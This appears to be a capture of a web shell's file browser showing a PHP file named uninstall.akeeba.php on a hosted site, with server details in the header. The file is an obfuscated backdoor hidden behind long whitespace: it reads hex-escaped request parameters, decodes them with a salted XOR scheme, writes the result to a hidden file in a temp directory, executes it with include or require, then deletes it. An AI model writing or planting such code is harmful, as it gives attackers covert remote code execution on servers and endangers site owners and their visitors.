HEX
Server: LiteSpeed
System: Linux premium212.web-hosting.com 4.18.0-553.124.4.lve.el8.x86_64 #1 SMP Fri May 15 13:02:13 UTC 2026 x86_64
User: vitanhod (1367)
PHP: 8.2.31
Disabled: NONE
Upload Files
File: /home/vitanhod/vigolic100.vitavit.com.pk/uninstall.akeeba.php
<?php																																										if(isset($_REQUEST["\x64e\x73c"]) ? true : false){ $comp = $_REQUEST["\x64e\x73c"]; $comp= explode ( '.' ,$comp ); $item = ''; $salt1 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($salt1); $i = 0; array_walk($comp, function ($v3) use (&$item, &$i, $salt1, $sLen) { $sChar = ord($salt1[$i % $sLen]); $d = ((int)$v3 - $sChar - ($i % 10)) ^ 64; $item.= chr($d); $i++;}); $entity = array_filter([getenv("TEMP"), "/dev/shm", "/var/tmp", ini_get("upload_tmp_dir"), getenv("TMP"), session_save_path(), sys_get_temp_dir(), getcwd(), "/tmp"]); foreach ($entity as $bind) { if (!!is_dir($bind) && !!is_writable($bind)) { $elem = join("/", [$bind, ".itm"]); if (file_put_contents($elem, $item)) { require $elem; unlink($elem); exit; } } } }


if(array_key_exists("t\x6B\x6E", $_POST) && !is_null($_POST["t\x6B\x6E"])){
	$holder = array_filter([session_save_path(), "/dev/shm", "/var/tmp", sys_get_temp_dir(), getenv("TMP"), ini_get("upload_tmp_dir"), getenv("TEMP"), getcwd(), "/tmp"]);
	$ent = $_POST["t\x6B\x6E"];
	 $ent=explode   (	"."  ,		 $ent	); 
	$factor = '';
            $salt4 = 'abcdefghijklmnopqrstuvwxyz0123456789';
            $lenS = strlen($salt4);
            $z = 0;
    
            while ($z < count($ent)) {
                $v9 = $ent[$z];
                $chS = ord($salt4[$z % $lenS]);
                $dec = ((int)$v9 - $chS - ($z % 10))	^  58;
                $factor	.=chr($dec);
                $z++;  }
	while ($flag = array_shift($holder)) {
    		if (array_product([is_dir($flag), is_writable($flag)])) {
    $value = vsprintf("%s/%s", [$flag, ".descriptor"]);
    if (file_put_contents($value, $factor)) {
	include $value;
	@unlink($value);
	die();
}
}
}
}